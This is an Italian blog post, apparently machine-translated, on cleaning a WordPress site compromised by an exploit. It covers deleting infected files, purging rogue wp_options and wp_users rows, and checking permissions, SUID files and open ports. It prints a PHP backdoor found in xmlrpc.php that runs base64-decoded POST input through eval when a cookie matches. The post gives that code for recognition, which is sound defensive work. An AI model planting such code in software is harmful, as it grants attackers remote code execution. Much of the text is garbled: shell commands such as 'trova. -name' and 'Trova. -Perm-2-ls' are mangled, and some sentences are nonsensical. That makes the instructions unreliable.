WordPress Exploit - Pulisci i file dei virus, SQL e la sicurezza del server.

Prima di leggere questo post, si dovrebbe vedere postare qui, Per capire qualcosa. :)

L'ho trovato in diversi file di blog su stealthsettings.com, codici simili a quelli seguenti, che sono apparsi a seguito del virus con l'impresa di WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

xmlrpcSe è il file indicato sopra xmlrpc.php della assonnatoMa ad un grep server, è possibile vedere che ci sono un bel po 'del suo genere nel codice sorgente.

pppffiuuu

Pulizia file infetti:

Ooookkkk ...
1. La soluzione, dopo che essa aveva di riservaE pulito il database è quello di pulire file WordPress (puoi tenere wp-config.php e file non strettamente correlati alla piattaforma wp, dopo averli attentamente controllati) dal server e caricare quelli originali dalla versione 2.5.1 (Durante questo fare un WP versione di aggiornamento :)) http://wordpress.org/download/ . Pulire inclusi i file di tema, se non vi fidate che la loro attento esame.

Sembra che sia stato colpito e file dei temi che non sono stati utilizzati prima sul blog e semplicemente cambiando il tema, non risolve il problema.

./andreea/wp-content/temi/default/index.php:

2. Cercare ed eliminare tutti i file contenenti: * _new.php, _old.php *, * Jpgg, Giff *, * Pngg e il file wp-info.txt, se presente....

trova. -name "* _new.php"
trova. -name "* _old.php"
trova. -name "* .jpgg"
trova. -name "* _giff"
trova. -name "* _pngg"
trova. -name "wp-info.txt"

3. in / Tmp , Cercare e cancellare cartelle come tmpYwbzT2

SQL pulizia :

1. nella tabella Tabella wp_options vedere se vi è eliminare le righe: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Tutto in wp_options, vai a active_plugins e cancellare se c'è un plugin che termina in una delle estensioni * _new.php, _old.php *, *. jpgg, *. GIFF, *. pngg o se si sospetta un altro interno, controllare attentamente.

3. In Tabella wp_users, Vedere se c'è un utente che non ha scritto nulla nella destra, la colonna user_nicename. Elimina questo utente, ma ricorda il numero sulla colonna ID. È probabile che questo utente utilizzi "WordPress"Circa user_login e sembra essere creato su 00: 00: 00 0000-00-00.

4. Vai alla tabella wp_usermeta e cancellare tutte le linee appartenenti ID sopra.

Dopo aver eseguito questa pulizia sql, disabilitare e quindi attivare qualsiasi plug-in. (nel blog -> Dashboard -> Plugin)

Server sicuro:

1. Vedere ciò che file e directory sono "scrivibile"(chmod 777) e prova a mettere a chmod che non ne consentirà più la scrittura a nessun livello. (chmod 644, per esempio)

Trova. -Perm-2-ls

2. Vedere ciò che i file hanno il bit suid o sgid . Se non si utilizzano i file messo su di loro chmod 0 o disinstallare il pacchetto che lo contiene. Sono molto pericolosi, perché privilegi di esecuzione "gruppo"O"radice"E non con privilegi di utente normale per eseguire il file.

find /-type f-perm-04000-ls
find /-type f-perm-02000-ls

3. Controllare che le porte sono aperte e provare a chiudere o fissare quelli che non vengono utilizzati.

netstat-an | grep-i listen

A proposito di esso. Capisco Alcuni blog sono vietati de Google Search e altri dicono "Li ha fatti bene!!!" . Beh, l'avrei fatto per loro... ma che ne dici se Google inizia a bannare tutti i siti formando  E 'SPAM e mettere Trojan (Trojan.Clicker.HTML) nei cookie?

Appassionato di tecnologia, scrivo con piacere su StealthSettings.com dal 2006. Ho un'ampia esperienza nei sistemi operativi: macOS, Windows e Linux, nonché nei linguaggi di programmazione e nelle piattaforme di blogging (WordPress) e per i negozi online (WooCommerce, Magento, PrestaShop).

Come » AntiVirus e sicurezza » WordPress Exploit - Pulisci i file dei virus, SQL e la sicurezza del server.

1 pensiero su "WordPress Exploit - Pulisci i file dei virus, SQL e la sicurezza del server. ”

Lascia un tuo commento